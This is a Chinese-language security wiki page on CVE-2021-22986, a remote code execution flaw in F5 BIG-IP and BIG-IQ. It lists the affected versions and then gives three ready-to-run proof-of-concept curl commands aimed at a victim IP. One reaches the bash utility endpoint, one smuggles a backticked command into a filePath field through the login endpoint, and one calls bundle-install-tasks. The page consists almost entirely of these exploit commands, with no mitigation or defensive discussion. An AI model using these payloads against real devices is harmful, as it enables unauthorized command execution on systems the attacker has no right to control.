menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right F5 BIG-IP chevron_right CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2021-22986 F5 BIG-IP 远程代码执行

    影响版本: BIG-IP:

    • 16.0.0-16.0.1
    • 15.1.0-15.1.2
    • 14.1.0-14.1.3.1
    • 13.1.0-13.1.3.5
    • 12.1.0-12.1.5.2

    BIG-IQ:

    • 7.1.0-7.1.0.2
    • 7.0.0-7.0.0.1
    • 6.0.0-6.1.0

    poc1:

    curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

    poc2:

    curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

    poc3:

    curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'

    @wugeej